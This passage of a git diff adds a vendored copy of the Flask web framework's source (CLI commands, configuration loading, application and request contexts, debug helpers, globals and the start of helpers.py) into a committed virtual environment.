help="Specify a certificate file to use HTTPS.", + is_eager=True, +) +@click.option( + "--key", + type=click.Path(exists=True, dir_okay=False, resolve_path=True), + callback=_validate_key, + expose_value=False, + help="The key file to use when specifying a certificate.", +) +@click.option( + "--reload/--no-reload", + default=None, + help="Enable or disable the reloader. By default the reloader " + "is active if debug is enabled.", +) +@click.option( + "--debugger/--no-debugger", + default=None, + help="Enable or disable the debugger. By default the debugger " + "is active if debug is enabled.", +) +@click.option( + "--with-threads/--without-threads", + default=True, + help="Enable or disable multithreading.", +) +@click.option( + "--extra-files", + default=None, + type=SeparatedPathType(), + help=( + "Extra files that trigger a reload on change. Multiple paths" + f" are separated by {os.path.pathsep!r}." + ), +) +@click.option( + "--exclude-patterns", + default=None, + type=SeparatedPathType(), + help=( + "Files matching these fnmatch patterns will not trigger a reload" + " on change. Multiple patterns are separated by" + f" {os.path.pathsep!r}." + ), +) +@pass_script_info +def run_command( + info, + host, + port, + reload, + debugger, + with_threads, + cert, + extra_files, + exclude_patterns, +): + """Run a local development server. + + This server is for development purposes only. It does not provide + the stability, security, or performance of production WSGI servers. + + The reloader and debugger are enabled by default with the '--debug' + option. + """ + try: + app = info.load_app() + except Exception as e: + if is_running_from_reloader(): + # When reloading, print out the error immediately, but raise + # it later so the debugger or server can handle it. + traceback.print_exc() + err = e + + def app(environ, start_response): + raise err from None + + else: + # When not reloading, raise the error immediately so the + # command fails. + raise e from None + + debug = get_debug_flag() + + if reload is None: + reload = debug + + if debugger is None: + debugger = debug + + show_server_banner(debug, info.app_import_path) + + run_simple( + host, + port, + app, + use_reloader=reload, + use_debugger=debugger, + threaded=with_threads, + ssl_context=cert, + extra_files=extra_files, + exclude_patterns=exclude_patterns, + ) + + +run_command.params.insert(0, _debug_option) + + +@click.command("shell", short_help="Run a shell in the app context.") +@with_appcontext +def shell_command() -> None: + """Run an interactive Python shell in the context of a given + Flask application. The application will populate the default + namespace of this shell according to its configuration. + + This is useful for executing small snippets of management code + without having to manually configure the application. + """ + import code + + banner = ( + f"Python {sys.version} on {sys.platform}\n" + f"App: {current_app.import_name}\n" + f"Instance: {current_app.instance_path}" + ) + ctx: dict = {} + + # Support the regular Python interpreter startup script if someone + # is using it. + startup = os.environ.get("PYTHONSTARTUP") + if startup and os.path.isfile(startup): + with open(startup) as f: + eval(compile(f.read(), startup, "exec"), ctx) + + ctx.update(current_app.make_shell_context()) + + # Site, customize, or startup script can set a hook to call when + # entering interactive mode. The default one sets up readline with + # tab and history completion. + interactive_hook = getattr(sys, "__interactivehook__", None) + + if interactive_hook is not None: + try: + import readline + from rlcompleter import Completer + except ImportError: + pass + else: + # rlcompleter uses __main__.__dict__ by default, which is + # flask.__main__. Use the shell context instead. + readline.set_completer(Completer(ctx).complete) + + interactive_hook() + + code.interact(banner=banner, local=ctx) + + +@click.command("routes", short_help="Show the routes for the app.") +@click.option( + "--sort", + "-s", + type=click.Choice(("endpoint", "methods", "domain", "rule", "match")), + default="endpoint", + help=( + "Method to sort routes by. 'match' is the order that Flask will match routes" + " when dispatching a request." + ), +) +@click.option("--all-methods", is_flag=True, help="Show HEAD and OPTIONS methods.") +@with_appcontext +def routes_command(sort: str, all_methods: bool) -> None: + """Show all registered routes with endpoints and methods.""" + rules = list(current_app.url_map.iter_rules()) + + if not rules: + click.echo("No routes were registered.") + return + + ignored_methods = set() if all_methods else {"HEAD", "OPTIONS"} + host_matching = current_app.url_map.host_matching + has_domain = any(rule.host if host_matching else rule.subdomain for rule in rules) + rows = [] + + for rule in rules: + row = [ + rule.endpoint, + ", ".join(sorted((rule.methods or set()) - ignored_methods)), + ] + + if has_domain: + row.append((rule.host if host_matching else rule.subdomain) or "") + + row.append(rule.rule) + rows.append(row) + + headers = ["Endpoint", "Methods"] + sorts = ["endpoint", "methods"] + + if has_domain: + headers.append("Host" if host_matching else "Subdomain") + sorts.append("domain") + + headers.append("Rule") + sorts.append("rule") + + try: + rows.sort(key=itemgetter(sorts.index(sort))) + except ValueError: + pass + + rows.insert(0, headers) + widths = [max(len(row[i]) for row in rows) for i in range(len(headers))] + rows.insert(1, ["-" * w for w in widths]) + template = " ".join(f"{{{i}:<{w}}}" for i, w in enumerate(widths)) + + for row in rows: + click.echo(template.format(*row)) + + +cli = FlaskGroup( + name="flask", + help="""\ +A general utility script for Flask applications. + +An application to load must be given with the '--app' option, +'FLASK_APP' environment variable, or with a 'wsgi.py' or 'app.py' file +in the current directory. +""", +) + + +def main() -> None: + cli.main() + + +if __name__ == "__main__": + main() diff --git a/env/Lib/site-packages/flask/config.py b/env/Lib/site-packages/flask/config.py new file mode 100644 index 00000000..5f921b4d --- /dev/null +++ b/env/Lib/site-packages/flask/config.py @@ -0,0 +1,347 @@ +from __future__ import annotations + +import errno +import json +import os +import types +import typing as t + +from werkzeug.utils import import_string + + +class ConfigAttribute: + """Makes an attribute forward to the config""" + + def __init__(self, name: str, get_converter: t.Callable | None = None) -> None: + self.__name__ = name + self.get_converter = get_converter + + def __get__(self, obj: t.Any, owner: t.Any = None) -> t.Any: + if obj is None: + return self + rv = obj.config[self.__name__] + if self.get_converter is not None: + rv = self.get_converter(rv) + return rv + + def __set__(self, obj: t.Any, value: t.Any) -> None: + obj.config[self.__name__] = value + + +class Config(dict): + """Works exactly like a dict but provides ways to fill it from files + or special dictionaries. There are two common patterns to populate the + config. + + Either you can fill the config from a config file:: + + app.config.from_pyfile('yourconfig.cfg') + + Or alternatively you can define the configuration options in the + module that calls :meth:`from_object` or provide an import path to + a module that should be loaded. It is also possible to tell it to + use the same module and with that provide the configuration values + just before the call:: + + DEBUG = True + SECRET_KEY = 'development key' + app.config.from_object(__name__) + + In both cases (loading from any Python file or loading from modules), + only uppercase keys are added to the config. This makes it possible to use + lowercase values in the config file for temporary values that are not added + to the config or to define the config keys in the same file that implements + the application. + + Probably the most interesting way to load configurations is from an + environment variable pointing to a file:: + + app.config.from_envvar('YOURAPPLICATION_SETTINGS') + + In this case before launching the application you have to set this + environment variable to the file you want to use. On Linux and OS X + use the export statement:: + + export YOURAPPLICATION_SETTINGS='/path/to/config/file' + + On windows use `set` instead. + + :param root_path: path to which files are read relative from. When the + config object is created by the application, this is + the application's :attr:`~flask.Flask.root_path`. + :param defaults: an optional dictionary of default values + """ + + def __init__( + self, root_path: str | os.PathLike, defaults: dict | None = None + ) -> None: + super().__init__(defaults or {}) + self.root_path = root_path + + def from_envvar(self, variable_name: str, silent: bool = False) -> bool: + """Loads a configuration from an environment variable pointing to + a configuration file. This is basically just a shortcut with nicer + error messages for this line of code:: + + app.config.from_pyfile(os.environ['YOURAPPLICATION_SETTINGS']) + + :param variable_name: name of the environment variable + :param silent: set to ``True`` if you want silent failure for missing + files. + :return: ``True`` if the file was loaded successfully. + """ + rv = os.environ.get(variable_name) + if not rv: + if silent: + return False + raise RuntimeError( + f"The environment variable {variable_name!r} is not set" + " and as such configuration could not be loaded. Set" + " this variable and make it point to a configuration" + " file" + ) + return self.from_pyfile(rv, silent=silent) + + def from_prefixed_env( + self, prefix: str = "FLASK", *, loads: t.Callable[[str], t.Any] = json.loads + ) -> bool: + """Load any environment variables that start with ``FLASK_``, + dropping the prefix from the env key for the config key. Values + are passed through a loading function to attempt to convert them + to more specific types than strings. + + Keys are loaded in :func:`sorted` order. + + The default loading function attempts to parse values as any + valid JSON type, including dicts and lists. + + Specific items in nested dicts can be set by separating the + keys with double underscores (``__``). If an intermediate key + doesn't exist, it will be initialized to an empty dict. + + :param prefix: Load env vars that start with this prefix, + separated with an underscore (``_``). + :param loads: Pass each string value to this function and use + the returned value as the config value. If any error is + raised it is ignored and the value remains a string. The + default is :func:`json.loads`. + + .. versionadded:: 2.1 + """ + prefix = f"{prefix}_" + len_prefix = len(prefix) + + for key in sorted(os.environ): + if not key.startswith(prefix): + continue + + value = os.environ[key] + + try: + value = loads(value) + except Exception: + # Keep the value as a string if loading failed. + pass + + # Change to key.removeprefix(prefix) on Python >= 3.9. + key = key[len_prefix:] + + if "__" not in key: + # A non-nested key, set directly. + self[key] = value + continue + + # Traverse nested dictionaries with keys separated by "__". + current = self + *parts, tail = key.split("__") + + for part in parts: + # If an intermediate dict does not exist, create it. + if part not in current: + current[part] = {} + + current = current[part] + + current[tail] = value + + return True + + def from_pyfile(self, filename: str | os.PathLike, silent: bool = False) -> bool: + """Updates the values in the config from a Python file. This function + behaves as if the file was imported as module with the + :meth:`from_object` function. + + :param filename: the filename of the config. This can either be an + absolute filename or a filename relative to the + root path. + :param silent: set to ``True`` if you want silent failure for missing + files. + :return: ``True`` if the file was loaded successfully. + + .. versionadded:: 0.7 + `silent` parameter. + """ + filename = os.path.join(self.root_path, filename) + d = types.ModuleType("config") + d.__file__ = filename + try: + with open(filename, mode="rb") as config_file: + exec(compile(config_file.read(), filename, "exec"), d.__dict__) + except OSError as e: + if silent and e.errno in (errno.ENOENT, errno.EISDIR, errno.ENOTDIR): + return False + e.strerror = f"Unable to load configuration file ({e.strerror})" + raise + self.from_object(d) + return True + + def from_object(self, obj: object | str) -> None: + """Updates the values from the given object. An object can be of one + of the following two types: + + - a string: in this case the object with that name will be imported + - an actual object reference: that object is used directly + + Objects are usually either modules or classes. :meth:`from_object` + loads only the uppercase attributes of the module/class. A ``dict`` + object will not work with :meth:`from_object` because the keys of a + ``dict`` are not attributes of the ``dict`` class. + + Example of module-based configuration:: + + app.config.from_object('yourapplication.default_config') + from yourapplication import default_config + app.config.from_object(default_config) + + Nothing is done to the object before loading. If the object is a + class and has ``@property`` attributes, it needs to be + instantiated before being passed to this method. + + You should not use this function to load the actual configuration but + rather configuration defaults. The actual config should be loaded + with :meth:`from_pyfile` and ideally from a location not within the + package because the package might be installed system wide. + + See :ref:`config-dev-prod` for an example of class-based configuration + using :meth:`from_object`. + + :param obj: an import name or object + """ + if isinstance(obj, str): + obj = import_string(obj) + for key in dir(obj): + if key.isupper(): + self[key] = getattr(obj, key) + + def from_file( + self, + filename: str | os.PathLike, + load: t.Callable[[t.IO[t.Any]], t.Mapping], + silent: bool = False, + text: bool = True, + ) -> bool: + """Update the values in the config from a file that is loaded + using the ``load`` parameter. The loaded data is passed to the + :meth:`from_mapping` method. + + .. code-block:: python + + import json + app.config.from_file("config.json", load=json.load) + + import tomllib + app.config.from_file("config.toml", load=tomllib.load, text=False) + + :param filename: The path to the data file. This can be an + absolute path or relative to the config root path. + :param load: A callable that takes a file handle and returns a + mapping of loaded data from the file. + :type load: ``Callable[[Reader], Mapping]`` where ``Reader`` + implements a ``read`` method. + :param silent: Ignore the file if it doesn't exist. + :param text: Open the file in text or binary mode. + :return: ``True`` if the file was loaded successfully. + + .. versionchanged:: 2.3 + The ``text`` parameter was added. + + .. versionadded:: 2.0 + """ + filename = os.path.join(self.root_path, filename) + + try: + with open(filename, "r" if text else "rb") as f: + obj = load(f) + except OSError as e: + if silent and e.errno in (errno.ENOENT, errno.EISDIR): + return False + + e.strerror = f"Unable to load configuration file ({e.strerror})" + raise + + return self.from_mapping(obj) + + def from_mapping( + self, mapping: t.Mapping[str, t.Any] | None = None, **kwargs: t.Any + ) -> bool: + """Updates the config like :meth:`update` ignoring items with + non-upper keys. + + :return: Always returns ``True``. + + .. versionadded:: 0.11 + """ + mappings: dict[str, t.Any] = {} + if mapping is not None: + mappings.update(mapping) + mappings.update(kwargs) + for key, value in mappings.items(): + if key.isupper(): + self[key] = value + return True + + def get_namespace( + self, namespace: str, lowercase: bool = True, trim_namespace: bool = True + ) -> dict[str, t.Any]: + """Returns a dictionary containing a subset of configuration options + that match the specified namespace/prefix. Example usage:: + + app.config['IMAGE_STORE_TYPE'] = 'fs' + app.config['IMAGE_STORE_PATH'] = '/var/app/images' + app.config['IMAGE_STORE_BASE_URL'] = 'http://img.website.com' + image_store_config = app.config.get_namespace('IMAGE_STORE_') + + The resulting dictionary `image_store_config` would look like:: + + { + 'type': 'fs', + 'path': '/var/app/images', + 'base_url': 'http://img.website.com' + } + + This is often useful when configuration options map directly to + keyword arguments in functions or class constructors. + + :param namespace: a configuration namespace + :param lowercase: a flag indicating if the keys of the resulting + dictionary should be lowercase + :param trim_namespace: a flag indicating if the keys of the resulting + dictionary should not include the namespace + + .. versionadded:: 0.11 + """ + rv = {} + for k, v in self.items(): + if not k.startswith(namespace): + continue + if trim_namespace: + key = k[len(namespace) :] + else: + key = k + if lowercase: + key = key.lower() + rv[key] = v + return rv + + def __repr__(self) -> str: + return f"<{type(self).__name__} {dict.__repr__(self)}>" diff --git a/env/Lib/site-packages/flask/ctx.py b/env/Lib/site-packages/flask/ctx.py new file mode 100644 index 00000000..b37e4e04 --- /dev/null +++ b/env/Lib/site-packages/flask/ctx.py @@ -0,0 +1,440 @@ +from __future__ import annotations + +import contextvars +import sys +import typing as t +from functools import update_wrapper +from types import TracebackType + +from werkzeug.exceptions import HTTPException + +from . import typing as ft +from .globals import _cv_app +from .globals import _cv_request +from .signals import appcontext_popped +from .signals import appcontext_pushed + +if t.TYPE_CHECKING: # pragma: no cover + from .app import Flask + from .sessions import SessionMixin + from .wrappers import Request + + +# a singleton sentinel value for parameter defaults +_sentinel = object() + + +class _AppCtxGlobals: + """A plain object. Used as a namespace for storing data during an + application context. + + Creating an app context automatically creates this object, which is + made available as the :data:`g` proxy. + + .. describe:: 'key' in g + + Check whether an attribute is present. + + .. versionadded:: 0.10 + + .. describe:: iter(g) + + Return an iterator over the attribute names. + + .. versionadded:: 0.10 + """ + + # Define attr methods to let mypy know this is a namespace object + # that has arbitrary attributes. + + def __getattr__(self, name: str) -> t.Any: + try: + return self.__dict__[name] + except KeyError: + raise AttributeError(name) from None + + def __setattr__(self, name: str, value: t.Any) -> None: + self.__dict__[name] = value + + def __delattr__(self, name: str) -> None: + try: + del self.__dict__[name] + except KeyError: + raise AttributeError(name) from None + + def get(self, name: str, default: t.Any | None = None) -> t.Any: + """Get an attribute by name, or a default value. Like + :meth:`dict.get`. + + :param name: Name of attribute to get. + :param default: Value to return if the attribute is not present. + + .. versionadded:: 0.10 + """ + return self.__dict__.get(name, default) + + def pop(self, name: str, default: t.Any = _sentinel) -> t.Any: + """Get and remove an attribute by name. Like :meth:`dict.pop`. + + :param name: Name of attribute to pop. + :param default: Value to return if the attribute is not present, + instead of raising a ``KeyError``. + + .. versionadded:: 0.11 + """ + if default is _sentinel: + return self.__dict__.pop(name) + else: + return self.__dict__.pop(name, default) + + def setdefault(self, name: str, default: t.Any = None) -> t.Any: + """Get the value of an attribute if it is present, otherwise + set and return a default value. Like :meth:`dict.setdefault`. + + :param name: Name of attribute to get. + :param default: Value to set and return if the attribute is not + present. + + .. versionadded:: 0.11 + """ + return self.__dict__.setdefault(name, default) + + def __contains__(self, item: str) -> bool: + return item in self.__dict__ + + def __iter__(self) -> t.Iterator[str]: + return iter(self.__dict__) + + def __repr__(self) -> str: + ctx = _cv_app.get(None) + if ctx is not None: + return f"" + return object.__repr__(self) + + +def after_this_request(f: ft.AfterRequestCallable) -> ft.AfterRequestCallable: + """Executes a function after this request. This is useful to modify + response objects. The function is passed the response object and has + to return the same or a new one. + + Example:: + + @app.route('/') + def index(): + @after_this_request + def add_header(response): + response.headers['X-Foo'] = 'Parachute' + return response + return 'Hello World!' + + This is more useful if a function other than the view function wants to + modify a response. For instance think of a decorator that wants to add + some headers without converting the return value into a response object. + + .. versionadded:: 0.9 + """ + ctx = _cv_request.get(None) + + if ctx is None: + raise RuntimeError( + "'after_this_request' can only be used when a request" + " context is active, such as in a view function." + ) + + ctx._after_request_functions.append(f) + return f + + +def copy_current_request_context(f: t.Callable) -> t.Callable: + """A helper function that decorates a function to retain the current + request context. This is useful when working with greenlets. The moment + the function is decorated a copy of the request context is created and + then pushed when the function is called. The current session is also + included in the copied request context. + + Example:: + + import gevent + from flask import copy_current_request_context + + @app.route('/') + def index(): + @copy_current_request_context + def do_some_work(): + # do some work here, it can access flask.request or + # flask.session like you would otherwise in the view function. + ... + gevent.spawn(do_some_work) + return 'Regular response' + + .. versionadded:: 0.10 + """ + ctx = _cv_request.get(None) + + if ctx is None: + raise RuntimeError( + "'copy_current_request_context' can only be used when a" + " request context is active, such as in a view function." + ) + + ctx = ctx.copy() + + def wrapper(*args, **kwargs): + with ctx: + return ctx.app.ensure_sync(f)(*args, **kwargs) + + return update_wrapper(wrapper, f) + + +def has_request_context() -> bool: + """If you have code that wants to test if a request context is there or + not this function can be used. For instance, you may want to take advantage + of request information if the request object is available, but fail + silently if it is unavailable. + + :: + + class User(db.Model): + + def __init__(self, username, remote_addr=None): + self.username = username + if remote_addr is None and has_request_context(): + remote_addr = request.remote_addr + self.remote_addr = remote_addr + + Alternatively you can also just test any of the context bound objects + (such as :class:`request` or :class:`g`) for truthness:: + + class User(db.Model): + + def __init__(self, username, remote_addr=None): + self.username = username + if remote_addr is None and request: + remote_addr = request.remote_addr + self.remote_addr = remote_addr + + .. versionadded:: 0.7 + """ + return _cv_request.get(None) is not None + + +def has_app_context() -> bool: + """Works like :func:`has_request_context` but for the application + context. You can also just do a boolean check on the + :data:`current_app` object instead. + + .. versionadded:: 0.9 + """ + return _cv_app.get(None) is not None + + +class AppContext: + """The app context contains application-specific information. An app + context is created and pushed at the beginning of each request if + one is not already active. An app context is also pushed when + running CLI commands. + """ + + def __init__(self, app: Flask) -> None: + self.app = app + self.url_adapter = app.create_url_adapter(None) + self.g: _AppCtxGlobals = app.app_ctx_globals_class() + self._cv_tokens: list[contextvars.Token] = [] + + def push(self) -> None: + """Binds the app context to the current context.""" + self._cv_tokens.append(_cv_app.set(self)) + appcontext_pushed.send(self.app, _async_wrapper=self.app.ensure_sync) + + def pop(self, exc: BaseException | None = _sentinel) -> None: # type: ignore + """Pops the app context.""" + try: + if len(self._cv_tokens) == 1: + if exc is _sentinel: + exc = sys.exc_info()[1] + self.app.do_teardown_appcontext(exc) + finally: + ctx = _cv_app.get() + _cv_app.reset(self._cv_tokens.pop()) + + if ctx is not self: + raise AssertionError( + f"Popped wrong app context. ({ctx!r} instead of {self!r})" + ) + + appcontext_popped.send(self.app, _async_wrapper=self.app.ensure_sync) + + def __enter__(self) -> AppContext: + self.push() + return self + + def __exit__( + self, + exc_type: type | None, + exc_value: BaseException | None, + tb: TracebackType | None, + ) -> None: + self.pop(exc_value) + + +class RequestContext: + """The request context contains per-request information. The Flask + app creates and pushes it at the beginning of the request, then pops + it at the end of the request. It will create the URL adapter and + request object for the WSGI environment provided. + + Do not attempt to use this class directly, instead use + :meth:`~flask.Flask.test_request_context` and + :meth:`~flask.Flask.request_context` to create this object. + + When the request context is popped, it will evaluate all the + functions registered on the application for teardown execution + (:meth:`~flask.Flask.teardown_request`). + + The request context is automatically popped at the end of the + request. When using the interactive debugger, the context will be + restored so ``request`` is still accessible. Similarly, the test + client can preserve the context after the request ends. However, + teardown functions may already have closed some resources such as + database connections. + """ + + def __init__( + self, + app: Flask, + environ: dict, + request: Request | None = None, + session: SessionMixin | None = None, + ) -> None: + self.app = app + if request is None: + request = app.request_class(environ) + request.json_module = app.json + self.request: Request = request + self.url_adapter = None + try: + self.url_adapter = app.create_url_adapter(self.request) + except HTTPException as e: + self.request.routing_exception = e + self.flashes: list[tuple[str, str]] | None = None + self.session: SessionMixin | None = session + # Functions that should be executed after the request on the response + # object. These will be called before the regular "after_request" + # functions. + self._after_request_functions: list[ft.AfterRequestCallable] = [] + + self._cv_tokens: list[tuple[contextvars.Token, AppContext | None]] = [] + + def copy(self) -> RequestContext: + """Creates a copy of this request context with the same request object. + This can be used to move a request context to a different greenlet. + Because the actual request object is the same this cannot be used to + move a request context to a different thread unless access to the + request object is locked. + + .. versionadded:: 0.10 + + .. versionchanged:: 1.1 + The current session object is used instead of reloading the original + data. This prevents `flask.session` pointing to an out-of-date object. + """ + return self.__class__( + self.app, + environ=self.request.environ, + request=self.request, + session=self.session, + ) + + def match_request(self) -> None: + """Can be overridden by a subclass to hook into the matching + of the request. + """ + try: + result = self.url_adapter.match(return_rule=True) # type: ignore + self.request.url_rule, self.request.view_args = result # type: ignore + except HTTPException as e: + self.request.routing_exception = e + + def push(self) -> None: + # Before we push the request context we have to ensure that there + # is an application context. + app_ctx = _cv_app.get(None) + + if app_ctx is None or app_ctx.app is not self.app: + app_ctx = self.app.app_context() + app_ctx.push() + else: + app_ctx = None + + self._cv_tokens.append((_cv_request.set(self), app_ctx)) + + # Open the session at the moment that the request context is available. + # This allows a custom open_session method to use the request context. + # Only open a new session if this is the first time the request was + # pushed, otherwise stream_with_context loses the session. + if self.session is None: + session_interface = self.app.session_interface + self.session = session_interface.open_session(self.app, self.request) + + if self.session is None: + self.session = session_interface.make_null_session(self.app) + + # Match the request URL after loading the session, so that the + # session is available in custom URL converters. + if self.url_adapter is not None: + self.match_request() + + def pop(self, exc: BaseException | None = _sentinel) -> None: # type: ignore + """Pops the request context and unbinds it by doing that. This will + also trigger the execution of functions registered by the + :meth:`~flask.Flask.teardown_request` decorator. + + .. versionchanged:: 0.9 + Added the `exc` argument. + """ + clear_request = len(self._cv_tokens) == 1 + + try: + if clear_request: + if exc is _sentinel: + exc = sys.exc_info()[1] + self.app.do_teardown_request(exc) + + request_close = getattr(self.request, "close", None) + if request_close is not None: + request_close() + finally: + ctx = _cv_request.get() + token, app_ctx = self._cv_tokens.pop() + _cv_request.reset(token) + + # get rid of circular dependencies at the end of the request + # so that we don't require the GC to be active. + if clear_request: + ctx.request.environ["werkzeug.request"] = None + + if app_ctx is not None: + app_ctx.pop(exc) + + if ctx is not self: + raise AssertionError( + f"Popped wrong request context. ({ctx!r} instead of {self!r})" + ) + + def __enter__(self) -> RequestContext: + self.push() + return self + + def __exit__( + self, + exc_type: type | None, + exc_value: BaseException | None, + tb: TracebackType | None, + ) -> None: + self.pop(exc_value) + + def __repr__(self) -> str: + return ( + f"<{type(self).__name__} {self.request.url!r}" + f" [{self.request.method}] of {self.app.name}>" + ) diff --git a/env/Lib/site-packages/flask/debughelpers.py b/env/Lib/site-packages/flask/debughelpers.py new file mode 100644 index 00000000..e8360043 --- /dev/null +++ b/env/Lib/site-packages/flask/debughelpers.py @@ -0,0 +1,160 @@ +from __future__ import annotations + +import typing as t + +from .blueprints import Blueprint +from .globals import request_ctx +from .sansio.app import App + + +class UnexpectedUnicodeError(AssertionError, UnicodeError): + """Raised in places where we want some better error reporting for + unexpected unicode or binary data. + """ + + +class DebugFilesKeyError(KeyError, AssertionError): + """Raised from request.files during debugging. The idea is that it can + provide a better error message than just a generic KeyError/BadRequest. + """ + + def __init__(self, request, key): + form_matches = request.form.getlist(key) + buf = [ + f"You tried to access the file {key!r} in the request.files" + " dictionary but it does not exist. The mimetype for the" + f" request is {request.mimetype!r} instead of" + " 'multipart/form-data' which means that no file contents" + " were transmitted. To fix this error you should provide" + ' enctype="multipart/form-data" in your form.' + ] + if form_matches: + names = ", ".join(repr(x) for x in form_matches) + buf.append( + "\n\nThe browser instead transmitted some file names. " + f"This was submitted: {names}" + ) + self.msg = "".join(buf) + + def __str__(self): + return self.msg + + +class FormDataRoutingRedirect(AssertionError): + """This exception is raised in debug mode if a routing redirect + would cause the browser to drop the method or body. This happens + when method is not GET, HEAD or OPTIONS and the status code is not + 307 or 308. + """ + + def __init__(self, request): + exc = request.routing_exception + buf = [ + f"A request was sent to '{request.url}', but routing issued" + f" a redirect to the canonical URL '{exc.new_url}'." + ] + + if f"{request.base_url}/" == exc.new_url.partition("?")[0]: + buf.append( + " The URL was defined with a trailing slash. Flask" + " will redirect to the URL with a trailing slash if it" + " was accessed without one." + ) + + buf.append( + " Send requests to the canonical URL, or use 307 or 308 for" + " routing redirects. Otherwise, browsers will drop form" + " data.\n\n" + "This exception is only raised in debug mode." + ) + super().__init__("".join(buf)) + + +def attach_enctype_error_multidict(request): + """Patch ``request.files.__getitem__`` to raise a descriptive error + about ``enctype=multipart/form-data``. + + :param request: The request to patch. + :meta private: + """ + oldcls = request.files.__class__ + + class newcls(oldcls): + def __getitem__(self, key): + try: + return super().__getitem__(key) + except KeyError as e: + if key not in request.form: + raise + + raise DebugFilesKeyError(request, key).with_traceback( + e.__traceback__ + ) from None + + newcls.__name__ = oldcls.__name__ + newcls.__module__ = oldcls.__module__ + request.files.__class__ = newcls + + +def _dump_loader_info(loader) -> t.Generator: + yield f"class: {type(loader).__module__}.{type(loader).__name__}" + for key, value in sorted(loader.__dict__.items()): + if key.startswith("_"): + continue + if isinstance(value, (tuple, list)): + if not all(isinstance(x, str) for x in value): + continue + yield f"{key}:" + for item in value: + yield f" - {item}" + continue + elif not isinstance(value, (str, int, float, bool)): + continue + yield f"{key}: {value!r}" + + +def explain_template_loading_attempts(app: App, template, attempts) -> None: + """This should help developers understand what failed""" + info = [f"Locating template {template!r}:"] + total_found = 0 + blueprint = None + if request_ctx and request_ctx.request.blueprint is not None: + blueprint = request_ctx.request.blueprint + + for idx, (loader, srcobj, triple) in enumerate(attempts): + if isinstance(srcobj, App): + src_info = f"application {srcobj.import_name!r}" + elif isinstance(srcobj, Blueprint): + src_info = f"blueprint {srcobj.name!r} ({srcobj.import_name})" + else: + src_info = repr(srcobj) + + info.append(f"{idx + 1:5}: trying loader of {src_info}") + + for line in _dump_loader_info(loader): + info.append(f" {line}") + + if triple is None: + detail = "no match" + else: + detail = f"found ({triple[1] or ''!r})" + total_found += 1 + info.append(f" -> {detail}") + + seems_fishy = False + if total_found == 0: + info.append("Error: the template could not be found.") + seems_fishy = True + elif total_found > 1: + info.append("Warning: multiple loaders returned a match for the template.") + seems_fishy = True + + if blueprint is not None and seems_fishy: + info.append( + " The template was looked up from an endpoint that belongs" + f" to the blueprint {blueprint!r}." + ) + info.append(" Maybe you did not place a template in the right folder?") + info.append(" See https://flask.palletsprojects.com/blueprints/#templates") + + app.logger.info("\n".join(info)) diff --git a/env/Lib/site-packages/flask/globals.py b/env/Lib/site-packages/flask/globals.py new file mode 100644 index 00000000..e2c410cc --- /dev/null +++ b/env/Lib/site-packages/flask/globals.py @@ -0,0 +1,51 @@ +from __future__ import annotations + +import typing as t +from contextvars import ContextVar + +from werkzeug.local import LocalProxy + +if t.TYPE_CHECKING: # pragma: no cover + from .app import Flask + from .ctx import _AppCtxGlobals + from .ctx import AppContext + from .ctx import RequestContext + from .sessions import SessionMixin + from .wrappers import Request + + +_no_app_msg = """\ +Working outside of application context. + +This typically means that you attempted to use functionality that needed +the current application. To solve this, set up an application context +with app.app_context(). See the documentation for more information.\ +""" +_cv_app: ContextVar[AppContext] = ContextVar("flask.app_ctx") +app_ctx: AppContext = LocalProxy( # type: ignore[assignment] + _cv_app, unbound_message=_no_app_msg +) +current_app: Flask = LocalProxy( # type: ignore[assignment] + _cv_app, "app", unbound_message=_no_app_msg +) +g: _AppCtxGlobals = LocalProxy( # type: ignore[assignment] + _cv_app, "g", unbound_message=_no_app_msg +) + +_no_req_msg = """\ +Working outside of request context. + +This typically means that you attempted to use functionality that needed +an active HTTP request. Consult the documentation on testing for +information about how to avoid this problem.\ +""" +_cv_request: ContextVar[RequestContext] = ContextVar("flask.request_ctx") +request_ctx: RequestContext = LocalProxy( # type: ignore[assignment] + _cv_request, unbound_message=_no_req_msg +) +request: Request = LocalProxy( # type: ignore[assignment] + _cv_request, "request", unbound_message=_no_req_msg +) +session: SessionMixin = LocalProxy( # type: ignore[assignment] + _cv_request, "session", unbound_message=_no_req_msg +) diff --git a/env/Lib/site-packages/flask/helpers.py b/env/Lib/site-packages/flask/helpers.py new file mode 100644 index 00000000..13a5aa21 --- /dev/null +++ b/env/Lib/site-packages/flask/helpers.py @@ -0,0 +1,623 @@ +from __future__ import annotations + +import importlib.util +import os +import sys +import typing as t +from datetime import datetime +from functools import lru_cache +from functools import update_wrapper + +import werkzeug.utils +from werkzeug.exceptions import abort as _wz_abort +from werkzeug.utils import redirect as _wz_redirect + +from .globals import _cv_request +from .globals import current_app +from .globals import request +from .globals import request_ctx +from .globals import session +from .signals import message_flashed + +if t.TYPE_CHECKING: # pragma: no cover + from werkzeug.wrappers import Response as BaseResponse + from .wrappers import Response + + +def get_debug_flag() -> bool: + """Get whether debug mode should be enabled for the app, indicated by the + :envvar:`FLASK_DEBUG` environment variable. The default is ``False``. + """ + val = os.environ.get("FLASK_DEBUG") + return bool(val and val.lower() not in {"0", "false", "no"}) + + +def get_load_dotenv(default: bool = True) -> bool: + """Get whether the user has disabled loading default dotenv files by + setting :envvar:`FLASK_SKIP_DOTENV`. The default is ``True``, load + the files. + + :param default: What to return if the env var isn't set. + """ + val = os.environ.get("FLASK_SKIP_DOTENV") + + if not val: + return default + + return val.lower() in ("0", "false", "no") + + +def stream_with_context( + generator_or_function: ( + t.Iterator[t.AnyStr] | t.Callable[..., t.Iterator[t.AnyStr]] + ) +) -> t.Iterator[t.AnyStr]: + """Request contexts disappear when the response is started on the server. + This is done for efficiency reasons and to make it less likely to encounter + memory leaks with badly written WSGI middlewares. The downside is that if + you are using streamed responses, the generator cannot access request bound + information any more. + + This function however can help you keep the context around for longer:: + + from flask import stream_with_context, request, Response + + @app.route('/stream') + def streamed_response(): + @stream_with_context + def generate(): + yield 'Hello ' + yield request.args['name'] + yield '!' + return Response(generate()) + + Alternatively it can also be used around a specific generator:: + + from flask import stream_with_context, request, Response + + @app.route('/stream') + def streamed_response(): + def generate(): + yield 'Hello ' + yield request.args['name'] + yield '!' + return Response(stream_with_context(generate())) + + .. versionadded:: 0.9 + """ + try: + gen = iter(generator_or_function) # type: ignore + except TypeError: + + def decorator(*args: t.Any, **kwargs: t.Any) -> t.Any: + gen = generator_or_function(*args, **kwargs) # type: ignore + return stream_with_context(gen) + + return update_wrapper(decorator, generator_or_function) # type: ignore + + def generator() -> t.Generator: + ctx = _cv_request.get(None) + if ctx is None: + raise RuntimeError( + "'stream_with_context' can only be used when a request" + " context is active, such as 